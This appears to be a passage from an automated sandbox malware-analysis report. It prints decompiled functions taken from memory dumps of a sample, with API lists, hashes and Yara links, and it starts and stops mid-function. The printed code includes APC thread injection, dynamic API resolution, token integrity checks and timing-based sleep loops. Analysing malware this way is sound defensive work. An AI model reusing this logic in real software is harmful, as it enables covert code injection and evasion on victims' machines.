				_t6 = _t13 + 0x2c8e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02C8AD0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2c8d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02c881e7
0x02c881ef
0x02c881f3
0x02c881f9
0x02c881fe
0x02c88203
0x02c88206
0x02c88209
0x02c8820e
0x02c8820f
0x02c88212
0x02c88217
0x02c8821e
0x02c88228
0x02c8822a
0x02c8822b
0x02c8822e
0x02c8824a
0x02c88250
0x02c88254
0x02c882a2
0x02c88256
0x02c88263
0x02c88273
0x02c8827b
0x02c8828d
0x02c88291
0x00000000
0x00000000
0x02c8827d
0x02c88280
0x02c88285
0x02c88287
0x02c88287
0x02c88265
0x02c88267
0x02c88293
0x02c88294
0x02c88294
0x02c88263
0x02c882a9

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C85C91,?,?,4D283A53,?,?), ref: 02C881F3
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02C88209
_snwprintf.NTDLL ref: 02C8822E
CreateFileMappingW.KERNELBASE(000000FF,02C8D2A8,00000004,00000000,00001000,?), ref: 02C8824A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C85C91,?,?,4D283A53), ref: 02C8825C
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02C88273
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C85C91,?,?), ref: 02C88294
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C85C91,?,?,4D283A53), ref: 02C8829C

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: a54831ec5e463fd5edc4647406bb1dc458e6cf6ba08a8745f87efcfa4f820ebb
Instruction ID: 6bf858f01bf2319ea3b3565cd3317761014912b6c2339cc4406b61b408259ee5
Opcode Fuzzy Hash: a54831ec5e463fd5edc4647406bb1dc458e6cf6ba08a8745f87efcfa4f820ebb
Instruction Fuzzy Hash: 8721D272A80608BFD711BB64DC05F8E77A9AF84758F258222F606E71C0D770EE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C854DA, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C854DA(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2c8d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02C87E20(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02C8A5FA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02c854e7
0x02c854ee
0x02c854f5
0x02c85509
0x02c85514
0x02c8552c
0x02c85539
0x02c8553c
0x02c85541
0x02c8554c
0x02c85550
0x02c8555f
0x02c85563
0x02c8557f
0x02c8557f
0x02c85583
0x02c85583
0x02c85588
0x02c8558c
0x02c85592
0x02c85593
0x02c8559a
0x02c855a0

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02C8550C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02C8552C
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02C8553C
CloseHandle.KERNEL32(00000000), ref: 02C8558C

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02C8555F
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02C85567
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02C85577

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 49894e9ba5bddaa8b0cac7904fd8bdef53fe831f4f341a3cc8c98b149499d3fc
Instruction ID: 26167a1fb1068a87bfd779fc22d0f7cbe502cc7dc672cd8ec5558c8f8998216d
Opcode Fuzzy Hash: 49894e9ba5bddaa8b0cac7904fd8bdef53fe831f4f341a3cc8c98b149499d3fc
Instruction Fuzzy Hash: 26215C75D00218FFEB00AFA4DC44EAEBBBAEB48348F1085A6E511A6190C7719B55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02C85349, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02C85384
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02C85407
StrStrIW.SHLWAPI(00000000,006E0069), ref: 02C85447
SysFreeString.OLEAUT32(00000000), ref: 02C85469

Part of subcall function 02C85E3C: SysAllocString.OLEAUT32(02C8C2B0), ref: 02C85E8C

SafeArrayDestroy.OLEAUT32(00000000), ref: 02C854BC
SysFreeString.OLEAUT32(00000000), ref: 02C854CB

Part of subcall function 02C86872: Sleep.KERNELBASE(000001F4), ref: 02C868BA

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: e6e907ac1aa120f6f74ef2d2096ef24903575519aa5cf2c454aecd10b8502402
Instruction ID: 048aa4c85e8f9ffc7aa721ffee003500b22b4004add72e55db26511aa29d5eab
Opcode Fuzzy Hash: e6e907ac1aa120f6f74ef2d2096ef24903575519aa5cf2c454aecd10b8502402
Instruction Fuzzy Hash: 1E517135900609AFDB01DFA8C844A9EB7BAFFC8799F15C829E905EB250DB71DE05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D48150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D48150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D481CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d484144 + 0x6d485014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D48133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d484144 + 0x6d48519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D4815F1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6D481CC8: HeapAlloc.KERNEL32(00000000,?,6D481C03,00000208,00000000,00000000,?,?,?,6D4812A1,?), ref: 6D481CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D4816D5,?,?,?,?,?,00000002,?,?), ref: 6D481531
GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481553
GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481569
GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D48157F
GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481595
GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D4815AB

Part of subcall function 6D4815F1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6D48164E
Part of subcall function 6D4815F1: memset.NTDLL ref: 6D481670

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 868e30ca4b36f8b16259c003dd7aec6fc2995990b70ca90dfb64a260589077db
Instruction ID: 08ecca54b87395504ec3312aade5657e8bd11b8affb128fed2537a7a649765df
Opcode Fuzzy Hash: 868e30ca4b36f8b16259c003dd7aec6fc2995990b70ca90dfb64a260589077db
Instruction Fuzzy Hash: 18212F71A0060F9FDB11EF79C984E6A77FDAF062C6711442AE51AD7211EB70ED11CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D481F56, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d484108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d48410c;
						if( *0x6d48410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d484118;
								if( *0x6d484118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d48410c);
						}
						HeapDestroy( *0x6d484110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d484108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6d484110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d484130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D48179C(E6D48173D, E6D481C6E(_a12, 1, 0x6d484118, _t41));
							 *0x6d48410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6D484108), ref: 6D481F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D481F8D

Part of subcall function 6D48179C: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D484118,6D481FC6), ref: 6D4817B3
Part of subcall function 6D48179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4817C8
Part of subcall function 6D48179C: GetLastError.KERNEL32(00000000), ref: 6D4817D3
Part of subcall function 6D48179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6D4817DD
Part of subcall function 6D48179C: CloseHandle.KERNEL32(00000000), ref: 6D4817E4
Part of subcall function 6D48179C: SetLastError.KERNEL32(00000000), ref: 6D4817ED

InterlockedDecrement.KERNEL32(6D484108), ref: 6D481FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6D481FFA
CloseHandle.KERNEL32 ref: 6D482016
HeapDestroy.KERNEL32 ref: 6D482022

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 4f3afa6cd338eb05a77860b71116751e581259bb60ebc7e72010dc70a528a772
Instruction ID: 9b82ad71768e993088b55a44a3d5421c39fe4f20548c8f34d99de5f742f4d17c
Opcode Fuzzy Hash: 4f3afa6cd338eb05a77860b71116751e581259bb60ebc7e72010dc70a528a772
Instruction Fuzzy Hash: 92218475500246ABCB11AF69C88CF2977B9F76B7E7720452EE619D2242D734CD04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C8523A, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C8523A(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2c8d238 = _t10;
				if(_t10 != 0) {
					 *0x2c8d1a8 = GetTickCount();
					_t12 = E02C814CE(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02C8B1D6();
							_t33 = _t14 + _t16;
							_t18 = E02C880C5(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02C852E5(_t25) != 0) {
							 *0x2c8d260 = 1; // executed
						}
						_t12 = E02C85C02(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02c8523a
0x02c85240
0x02c85241
0x02c8524d
0x02c85253
0x02c8525a
0x02c8526a
0x02c8526f
0x02c85276
0x02c85278
0x02c8527d
0x02c85283
0x02c85289
0x02c85293
0x02c85297
0x02c85299
0x02c8529e
0x02c8529f
0x02c852a0
0x02c852a5
0x02c852ab
0x02c852b4
0x02c852b5
0x02c852ba
0x02c852c0
0x02c852cc
0x02c852ce
0x02c852ce
0x02c852d8
0x02c852d8
0x02c8525c
0x02c8525e
0x02c8525e
0x02c852e2

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02C8647E,?), ref: 02C8524D
GetTickCount.KERNEL32 ref: 02C85261
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02C8647E,?), ref: 02C8527D
SwitchToThread.KERNEL32(?,00000001,?,?,?,02C8647E,?), ref: 02C85283
_aullrem.NTDLL(?,?,00000009,00000000), ref: 02C852A0
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02C8647E,?), ref: 02C852BA

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: d0c8c363edf2083c2f2fde5aa24a8941504daf22d914de331a65da840ed885d4
Instruction ID: 860b09bd41f5ea43021ff59c3fc96ad3d8664a3b32339986450a4f72299f6d1b
Opcode Fuzzy Hash: d0c8c363edf2083c2f2fde5aa24a8941504daf22d914de331a65da840ed885d4
Instruction Fuzzy Hash: 9011E972A802046FE714BB74EC09F5A36D9AB843E5F51C71AF945D71C0EFB0D9108BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D48179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d484140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4817b3
0x6d4817b9
0x6d4817bd
0x6d4817c8
0x6d4817d0
0x6d4817d9
0x6d4817dd
0x6d4817e4
0x6d4817eb
0x6d4817ed
0x6d4817f3
0x6d4817d0
0x6d4817f7

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D484118,6D481FC6), ref: 6D4817B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4817C8
GetLastError.KERNEL32(00000000), ref: 6D4817D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6D4817DD
CloseHandle.KERNEL32(00000000), ref: 6D4817E4
SetLastError.KERNEL32(00000000), ref: 6D4817ED

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 23281038aec7917ac3aa1cd40d4c992955b8a2baf9e34903058560d1ddd67682
Instruction ID: 7e9d12a3b4e70d23ebadf07a27c9b4e71b9efa0d5d547ea5b8de9573c41a348b
Opcode Fuzzy Hash: 23281038aec7917ac3aa1cd40d4c992955b8a2baf9e34903058560d1ddd67682
Instruction Fuzzy Hash: 2FF03A32104661FBDB116FA08C4CF9FBA79FB0B682F10440CFA15E1144C721CC009BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C85C02, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02C85C02(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02C83EDF();
				if(_t21 != 0) {
					_t59 =  *0x2c8d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2c8d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2c8d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02C887A2( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2c8d2a4; // 0x245a5a8
					if( *0x2c8d25c > 5) {
						_t8 = _t26 + 0x2c8e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2c8ea15; // 0x44283a44
						_t27 = _t7;
					}
					E02C8A69B(_t27, _t27);
					_t31 = E02C881E7(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2c8d270 =  *0x2c8d270 ^ 0x81bbe65d;
						_t32 = E02C87E20(0x60);
						 *0x2c8d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2c8d32c; // 0x50e95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2c8d32c; // 0x50e95b0
							 *_t51 = 0x2c8e836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2c8d238, 0, 0x43);
							 *0x2c8d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2c8d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2c8d2a4; // 0x245a5a8
								_t13 = _t58 + 0x2c8e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2c8c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02C82D6E( ~_v8 &  *0x2c8d270, 0x2c8d00c); // executed
								_t42 = E02C8696A(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02C8418D(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02C88494(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E02C8620F(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2c8d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02C84359(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02c85c02
0x02c85c0d
0x02c85c10
0x02c85c13
0x02c85c16
0x02c85c1d
0x02c85c1f
0x02c85c2b
0x02c85c2d
0x02c85c2d
0x02c85c36
0x02c85c3c
0x02c85c41
0x02c85c5b
0x02c85c67
0x02c85c69
0x02c85c6e
0x02c85c78
0x02c85c78
0x02c85c70
0x02c85c70
0x02c85c70
0x02c85c70
0x02c85c7f
0x02c85c8c
0x02c85c93
0x02c85c98
0x02c85c98
0x02c85ca0
0x02c85ca3
0x02c85cc9
0x02c85cd5
0x02c85cda
0x02c85cdf
0x02c85ce1
0x02c85d0d
0x02c85d0f
0x02c85ce3
0x02c85ce7
0x02c85cec
0x02c85cf1
0x02c85cf8
0x02c85cfe
0x02c85d03
0x02c85d09
0x02c85d10
0x02c85d12
0x02c85d14
0x02c85d23
0x02c85d29
0x02c85d2e
0x02c85d30
0x02c85d60
0x02c85d62
0x02c85d32
0x02c85d32
0x02c85d38
0x02c85d45
0x02c85d4b
0x02c85d4b
0x02c85d53
0x02c85d5c
0x02c85d63
0x02c85d65
0x02c85d67
0x02c85d6e
0x02c85d7b
0x02c85d80
0x02c85d85
0x02c85d87
0x02c85d89
0x00000000
0x00000000
0x02c85d8b
0x02c85d90
0x02c85d92
0x02c85d99
0x02c85d9d
0x02c85da0
0x02c85db5
0x02c85db9
0x02c85dbe
0x00000000
0x02c85dbe
0x02c85da2
0x02c85da4
0x00000000
0x00000000
0x02c85daa
0x02c85daf
0x02c85db1
0x02c85db3
0x00000000
0x00000000
0x00000000
0x02c85db3
0x02c85d96
0x02c85d96
0x02c85d67
0x02c85ca5
0x02c85ca5
0x02c85caa
0x02c85dc0
0x02c85dc4
0x02c85dcc
0x02c85dcc
0x00000000
0x02c85dc4
0x02c85cb0
0x02c85cb3
0x02c85cbd
0x02c85cc4
0x00000000
0x02c85dd4
0x02c85dd4
0x02c85dd8
0x02c85ddc
0x02c85ddc

APIs

Part of subcall function 02C83EDF: GetModuleHandleA.KERNEL32(4C44544E,00000000,02C85C1B,00000000,00000000), ref: 02C83EEE

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02C85C98

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

memset.NTDLL ref: 02C85CE7
RtlInitializeCriticalSection.NTDLL(050E9570), ref: 02C85CF8

Part of subcall function 02C8620F: memset.NTDLL ref: 02C86224
Part of subcall function 02C8620F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02C86258
Part of subcall function 02C8620F: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02C86263

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02C85D23
wsprintfA.USER32 ref: 02C85D53

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: a93af5b4e29de44e83d4c710199fa95f9dd07f261650fbbcf56853b0ca02acd3
Instruction ID: 3a0bfacdf53c423f0cc35c6809c5717885ed2d48802d6352a166c5d7c281cf2f
Opcode Fuzzy Hash: a93af5b4e29de44e83d4c710199fa95f9dd07f261650fbbcf56853b0ca02acd3
Instruction Fuzzy Hash: E051D871E40614ABDB21BBB4DD48B5E77B8AB4874CF86C926E502D7280F7B09E14CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6D4810E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6D4810E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
